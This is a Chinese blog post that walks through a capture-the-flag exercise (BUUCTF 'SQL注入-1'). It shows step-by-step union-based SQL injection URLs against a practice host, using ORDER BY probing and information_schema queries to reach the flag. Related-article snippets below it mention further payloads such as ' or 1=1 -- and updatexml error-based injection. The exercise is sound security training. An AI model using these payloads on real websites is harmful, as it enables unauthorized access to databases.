BUUCTF SQL注入-1

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量784 收藏 7
点赞数 10
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_79340715/article/details/135881357
版权

前言:

最近学了一手SQL注入,就找了个题目练练手

写的比较长,我觉得认真看完挺有用的

我的解题思路:

拿到题目打开就是这样子的,发现有个id=1,那就不用说了,肯定有注入点,然后我就试了试把1改成2和3,

看到2这样和1的差不多,那就改成3试试

然后给了点提示:那就按提示来

然后你就发现id='3',其实这个提示比较明显了,就是字符型的注入点,两个引号嘛,那我们就试试报错

何为报错:

就是输入不同的数字看页面回显

构造payload:
第一次:
http://2c50e4d4-75ed-4e56-8e59-21c60637a9f9.node5.buuoj.cn:81/index.php?id=3' order by 3--+
第二次:
http://2c50e4d4-75ed-4e56-8e59-21c60637a9f9.node5.buuoj.cn:81/index.php?id=3' order by 4--+

可能有同学不知道--+是什么意思,其实就是注释符,把数据库中的引号注释掉,和#差不多,有些题目要用--+,有些用#

看到3的时候正常,4的时候不正常,那就能说明从1,2,3里找注入点

现在尝试爆数字

那什么又是爆数字呢:

像我们这题,我们发现3的时候不报错,4的时候报错,那就从1,2,3里找注入点,其他题目也一样

但是我这里构造语句的时候也有点疑惑,要是知道的给我在评论区解答解答

我发现这样构造不出来:
http://2c50e4d4-75ed-4e56-8e59-21c60637a9f9.node5.buuoj.cn:81/index.php?id=3' +UNION+ALL+SELECT+1,2,3--+
这样才能:
http://2c50e4d4-75ed-4e56-8e59-21c60637a9f9.node5.buuoj.cn:81/index.php?id=0' +UNION+ALL+SELECT+1,2,3--+
我试了试发现id=多少都行,除了1,2,3

这样就是没爆出来的

这样就是爆出来的,那就说明注入点在2,3里,现在我们试试爆数据库名和版本

这个就说明数据库名是note,但是这个MariaDB我也第一次见,那不懂就百度

那其实就是MYSQL注入了,那就接着构造payload,爆表名,这里我就不介绍了,和报错和爆数字差不多的,那像我这个是怎么写的呢,就是根据数据库的类型去网上查输入语句

http://2c50e4d4-75ed-4e56-8e59-21c60637a9f9.node5.buuoj.cn:81/index.php?id=0' +UNION+ALL+SELECT+1,table_name,3 from information_schema.tables where table_schema='note'--+

现在就是爆列名

http://2c50e4d4-75ed-4e56-8e59-21c60637a9f9.node5.buuoj.cn:81/index.php?id=0' +UNION+ALL+SELECT+1,column_name,3 from information_schema.columns where table_name='fl4g' and table_schema='note'--+

那一般情况下,flag应该是就在这个列名下面了

然后就出来了

flag:n1book{union_select_is_so_cool}

总结:

SQL注入就是一步一步来的,当然SQLMAP应该是能直接出来的,但是我觉得新手和我一样的还是可以试试手工注入的,更有成就感哈哈哈哈

 ⁨Str_kk
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
10-sql注入-mysql注入1
08-03
1. **SQL注入原理**: 当应用程序将用户提供的数据直接拼接到SQL查询中而不进行适当验证时,就可能发生SQL注入。攻击者可以通过构造特定的输入,使SQL查询执行非预期的操作,如读取、修改或删除敏感数据,甚至获取...
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
web buuctf [极客大挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1929
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
菜鸡摸鱼BUUCTF-SQL注入1
weixin_45734980的博客
04-06 201
菜鸡摸鱼BUUCTF[极客大挑战 2019]EasySQL第一步:玩玩第二步:用户名注入第三步:密码注入测试第四步:注入 [极客大挑战 2019]EasySQL 这题是SQL注入最基础的题目。但是要求用户名和密码全部注入否则会报错。 第一步:玩玩 测试注入一:没注入 测试一结果:wrong 第二步:用户名注入 其实一般来讲只注入用户名就能直接过了 测试二:只注入用户名 测试二结果:密码附近有错误 返回数据说明哪里有错误,说明此处有SQL注入漏洞 第三步:密码注入测试 测试三:只注入密码 测试三
BUUCTF关于sql注入的题目
最新发布
2302_80935968的博客
04-19 716
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
CTF刷题记录之Buuctf-N1BOOK——sql注入1
m_de_g的博客
06-07 1239
Buuctf刷题————N1BOOK——sql注入1 一、思路 1.URL后面的id=1,2,3;会出现不同的界面,但是,但我们输入4时,发现没有回显 2.推测有有三列,还是老方法, http://4d366f97-7645-4633-a532-1b86e5b44f90.node3.buuoj.cn/index.php?id=1’ 没有回显,当我们使用#注释’的时候,发现没有回显 http://4d366f97-7645-4633-a532-1b86e5b44f90.node3.buuoj.cn/in
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4594
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
BUUCTF N1BOOK [第一章 web入门]SQL注入-1
hivjianxian的博客
11-22 653
ctf题解
BUUCTF-N1BOOK-Web-SQL注入-1
m0_47154926的博客
10-06 335
判断是什么类型的注入: 至此可以判断出是字符型注入 然后开始注入,先order by判断列数 order by 3 有回显 order by 4 没有回显 所以一共三列 然后用union select进行联合查询 可以发现id=1’ union select 1,2,3 %23 并未显示(这里的1,2,3列,不知道列名可以用1,2,3来代替) 为什么要用union select? 我们需要通过注入来得到我们想要的信息,但是这个信息是在后台查询到的,并没有返回到我们手中,我们要做的是将查询..
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
SQL注入-概述-ppt.pptx
10-27
SQL相关资料
SQL注入-防范-ppt.pptx
10-27
SQL相关资料
BuuCTF之N1BOOK~SQL注入1
Yinger699的博客
09-27 497
hello~大家好!我是’今天不吃糖, 一只纯纯的小白,正在学习CTF,写文章目的是为了多积累一下解题思路 1.通过判断id=1,2,3,4发现,只有当id=4时没有回显,初次判定字段数为3. 2.判断闭合方式 (1)在id=1后加一个单引号 发现没有回显,证明不是使用单引号闭合的 (2)在单引号后添加# 发现也没有回显,大佬说,这是编码的问题,将’#进行URL编码 果然,正常回显了,达到闭合效果。 3.判断是否过滤了and和or (1)输入万能钥匙 ’ or 1=1# 证明or没被过滤 and也没有被
[第一章 web入门]SQL注入-1BUUCTF
observer的博客
03-14 949
[第一章 web入门]SQL注入-1BUUCTF
BUUCTF【Web】随便注(SQL注入
qq_70434663的博客
03-02 514
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL注入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL注入。第一步,测试注入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
buuctf-sql部分类型题目
2201_75327657的博客
07-19 88
3.盲注([CISCN2019 华北赛区 Day2 Web1]Hack World)经过各种尝试发现updatexml和extractvalue两个关键词没有被过滤。1.报错注入([极客大挑战 2019]HardSQL 1)发现有东西被过滤了大概就是空格被过滤了那就利用()绕过试试。从他给我的信息’‘1'''可以看出是单引号闭合引用。但是看这个没有看出来有flag的存在那就看看全部表。发现就^没有被过滤^符号又涉及到了异或绕过。他给了一半的flag那还需要右边一半。那就试试1’看看是什么情况。
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3955
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1804
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
BUUCTF&&SQL注入(部分)
huohaowen的博客
01-30 1277
今天不被靶场打,被ctf虐😓😓😓
BUUCTF SQL注入1
03-29
这是一道基础的 SQL 注入题目,我们需要在登录页面中注入 SQL 语句来绕过验证,成功登录管理员账号。 首先,我们打开登录页面,输入任意用户名和密码,点击登录,可以看到页面返回了一段 SQL 语句: ``` SELECT * FROM users WHERE username = 'xxx' AND password = 'xxx' ``` 这是一个用于登录验证的 SQL 语句,我们可以通过注入来绕过这个验证。 在用户名和密码处尝试注入,输入 `' or 1=1 --`,点击登录,发现页面跳转到了管理员界面,注入成功。 这个注入语句中,`'` 表示闭合了用户名或密码的字符串,`or 1=1` 表示逻辑或,永远为真,`--` 表示 SQL 注释,注释后面的语句。 因此,注入后的 SQL 语句变为: ``` SELECT * FROM users WHERE username = '' or 1=1 --' AND password = '' or 1=1 --' ``` 其中,`--` 后面的语句被注释掉了,因此不会影响 SQL 语句的执行。 最后,我们成功登录了管理员账号,Flag 就在管理员界面上。 注意,这里的注入语句是基于题目情况而定的,实际情况可能会有所不同,需要结合实际情况来进行注入。同时,注入操作可能会对系统造成损害,需要谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值